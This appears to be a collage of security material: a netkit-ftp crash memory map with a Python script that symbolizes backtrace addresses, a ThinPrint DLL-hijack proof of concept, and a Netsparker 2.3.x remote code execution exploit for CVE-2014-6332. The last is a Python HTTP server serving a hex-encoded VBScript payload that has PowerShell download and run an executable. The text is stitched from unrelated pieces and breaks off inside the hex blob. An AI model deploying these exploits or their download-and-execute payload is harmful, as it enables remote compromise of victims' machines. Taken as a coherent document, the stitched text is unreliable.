7ffff718c000-7ffff718d000 r--p 00016000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so
7ffff718d000-7ffff718e000 rw-p 00017000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so
7ffff718e000-7ffff7190000 rw-p 00000000 00:00 0
7ffff7190000-7ffff7199000 r-xp 00000000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
7ffff7199000-7ffff7398000 ---p 00009000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
7ffff7398000-7ffff7399000 r--p 00008000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
7ffff7399000-7ffff739a000 rw-p 00009000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
7ffff739a000-7ffff73a5000 r-xp 00000000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so
7ffff73a5000-7ffff75a4000 ---p 0000b000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so
7ffff75a4000-7ffff75a5000 r--p 0000a000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so
7ffff75a5000-7ffff75a6000 rw-p 0000b000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so
7ffff75a6000-7ffff75cb000 r-xp 00000000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9
7ffff75cb000-7ffff77ca000 ---p 00025000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9
7ffff77ca000-7ffff77ce000 r--p 00024000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9
7ffff77ce000-7ffff77cf000 rw-p 00028000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9
7ffff77cf000-7ffff798a000 r-xp 00000000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff798a000-7ffff7b89000 ---p 001bb000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff7b89000-7ffff7b8d000 r--p 001ba000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff7b8d000-7ffff7b8f000 rw-p 001be000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff7b8f000-7ffff7b94000 rw-p 00000000 00:00 0
7ffff7b94000-7ffff7bd1000 r-xp 00000000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3
7ffff7bd1000-7ffff7dd1000 ---p 0003d000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3
7ffff7dd1000-7ffff7dd3000 r--p 0003d000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3
7ffff7dd3000-7ffff7dd9000 rw-p 0003f000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3
7ffff7dd9000-7ffff7dda000 rw-p 00000000 00:00 0
7ffff7dda000-7ffff7dfd000 r-xp 00000000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so
7ffff7fdf000-7ffff7fe2000 rw-p 00000000 00:00 0
7ffff7fea000-7ffff7feb000 rw-p 00000000 00:00 0
7ffff7feb000-7ffff7ff2000 r--s 00000000 08:01 920152 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
7ffff7ff2000-7ffff7ff8000 rw-p 00000000 00:00 0
7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar]
7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so
7ffff7ffd000-7ffff7ffe000 rw-p 00023000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so
7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

Program received signal SIGABRT, Aborted.
0x00007ffff7805cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
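The binary was built without debugging symbols, so the frames inside /usr/bin/ftp appear as bare addresses, and the libc frames are given as offsets. The memory map printed by glibc is enough to turn every address into a module plus file offset, which is what you feed to objdump or a disassembler to locate the strncat call. The following is an added triage helper, not part of the advisory; the log it parses is excerpted verbatim from the output above (backtrace plus the map lines those addresses fall in).

```python
import re

# Excerpt of the fortify output above: the backtrace and the map entries it refers to.
CRASH_LOG = """\
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x7338f)[0x7ffff784238f]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7ffff78d9c9c]
/lib/x86_64-linux-gnu/libc.so.6(+0x109b60)[0x7ffff78d8b60]
/lib/x86_64-linux-gnu/libc.so.6(__strncat_chk+0x13c)[0x7ffff78d7f9c]
/usr/bin/ftp[0x407a08]
/usr/bin/ftp[0x402cd0]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5)[0x7ffff77f0ec5]
/usr/bin/ftp[0x402f49]
======= Memory map: ========
00400000-00413000 r-xp 00000000 08:01 656161 /usr/bin/netkit-ftp
00612000-00613000 r--p 00012000 08:01 656161 /usr/bin/netkit-ftp
00613000-00615000 rw-p 00013000 08:01 656161 /usr/bin/netkit-ftp
00615000-00665000 rw-p 00000000 00:00 0 [heap]
7ffff77cf000-7ffff798a000 r-xp 00000000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffff798a000-7ffff7b89000 ---p 001bb000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""

# start-end perms file_offset dev inode [path]
MAP_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) (\S{4}) ([0-9a-f]+) \S+ \d+\s*(.*)$")
# binary(optional symbol+offset)[0xaddress]
BT_RE = re.compile(r"^(\S+?)(?:\((.*?)\))?\[0x([0-9a-f]+)\]$")


def parse_maps(log):
    """Return (start, end, perms, file_offset, path) for each map line."""
    maps = []
    for line in log.splitlines():
        m = MAP_RE.match(line.strip())
        if m:
            lo, hi, perms, off, path = m.groups()
            maps.append((int(lo, 16), int(hi, 16), perms, int(off, 16), path))
    return maps


def parse_backtrace(log):
    """Return (binary, symbol_text, address) for each backtrace frame."""
    frames = []
    for line in log.splitlines():
        m = BT_RE.match(line.strip())
        if m:
            frames.append((m.group(1), m.group(2) or "", int(m.group(3), 16)))
    return frames


def symbolize(addr, maps):
    """Map a runtime address to (path, file offset, perms) via the crash's memory map."""
    for lo, hi, perms, off, path in maps:
        if lo <= addr < hi:
            # file offset = distance into the mapping + the mapping's own file offset
            return path, addr - lo + off, perms
    return None


def triage(log=CRASH_LOG):
    """Resolve every frame; a frame outside any mapping comes back with None."""
    maps = parse_maps(log)
    return [(binary, sym, addr, symbolize(addr, maps))
            for binary, sym, addr in parse_backtrace(log)]


if __name__ == "__main__":
    for binary, sym, addr, hit in triage():
        where = "%s+%#x (%s)" % hit if hit else "unmapped"
        print("%#018x %-28s %s" % (addr, sym or binary, where))
```

Note the cross-check this gives you: glibc prints the first frame as `libc.so.6(+0x7338f)`, and the map arithmetic yields exactly file offset 0x7338f for 0x7ffff784238f, so the resolved offsets for the symbol-less /usr/bin/ftp frames (0x7a08, 0x2cd0, 0x2f49) can be trusted when you open /usr/bin/netkit-ftp in a disassembler.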
// source: https://www.securityfocus.com/bid/55421/info

ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code.

Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application.

#include <windows.h>

/* Proof-of-concept payload: pops calc.exe in the context of the process that loaded us. */
int hijack_poc()
{
    WinExec("calc.exe", SW_NORMAL);
    return 0;
}

/* Runs on every DllMain call (process/thread attach and detach), so the payload
 * fires as soon as the application loads this DLL in place of the expected one.
 * Returning FALSE makes the loader fail the load, but the payload has already run. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    hijack_poc();
    return 0;
}

Netsparker 2.3.x - Remote Code Execution

#!/usr/bin/python
# Title : Netsparker 2.3.X - Remote Code Execution
# Tested on Netsparker 2.3.x / Win 7
#
#
# Author : Hesam Bazvand
# E-Mail : black.king066@gmail.com
# FaceBook : https://www.facebook.com/hesam.king73
# Twitter : https://twitter.com/hesam_king73
#
#
# Exploit MS14-064 CVE-2014-6332
#
#
# 1 . run python code : python netsparker.py
# 2 . run netsparker
# 3 . "Start a New Scan"
# 4 . Enter your exploit link http://ipaddress:80/ in Target URL
# 5 . goto to "Authentication" Menu
# 6 . select "Form Authentication"
# 7 . Click "Next >"
# 8 . Your Link Download/Execute on your target ;)
# 9 . Finished ;)

import socket

HOST, PORT = '', 80

listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_socket.bind((HOST, PORT))
listen_socket.listen(1)
print 'Serving HTTP on port %s ...' % PORT

while True:
    client_connection, client_address = listen_socket.accept()
    request = client_connection.recv(1024)
    print request

    # hesam is the hex-escaped HTML page served to the embedded IE control: an
    # "IE=EmulateIE8" document carrying the CVE-2014-6332 VBScript exploit, whose
    # payload runs powershell.exe (with the "runas" verb, so UAC may prompt) to
    # download FILE_DOWNLOAD as load.exe and execute it.
    hesam=("\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76"
"\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65"
"\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68"
"\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20"
"\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63"
"\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75"
"\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20"
"\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62"
"\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22"
"\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65" "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65" "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61" "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c" "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d" "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53" "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b" "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70" "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e" "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61" "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73" "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55" "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d" "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d" "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61" "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78" "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20" "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a" "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28" "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a" 
"\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a" "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65" "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22" "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20" "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69" "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22" "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e" "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20" "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65" "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f" "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65" "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a" "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61" "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61" "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68" "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30" "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72" "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61" "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68" 
"\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28" "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f" "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75" "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69" "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e" "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29" "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d" "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69" "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f" "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a" "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33" "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e" "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66" "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45" "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20" "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72" "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76" 
"\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43" "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20" "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74" "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74" "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e" "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45" "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69" "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20" "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32" "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a" "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30" "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d" "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61" "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34" "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61" "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50" "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75" "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20" "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e" "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20" 
"\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28" "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20" "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20" "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d" "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b" "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e" "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64" "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28" "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20" "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68" "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20" "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37" "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75" "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d" 
"\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20" "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20" "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33" "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30" "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20" "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20" "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30" "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20" "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65" "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74" "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34" "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38" "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28" "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d" "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29" "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69" "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" 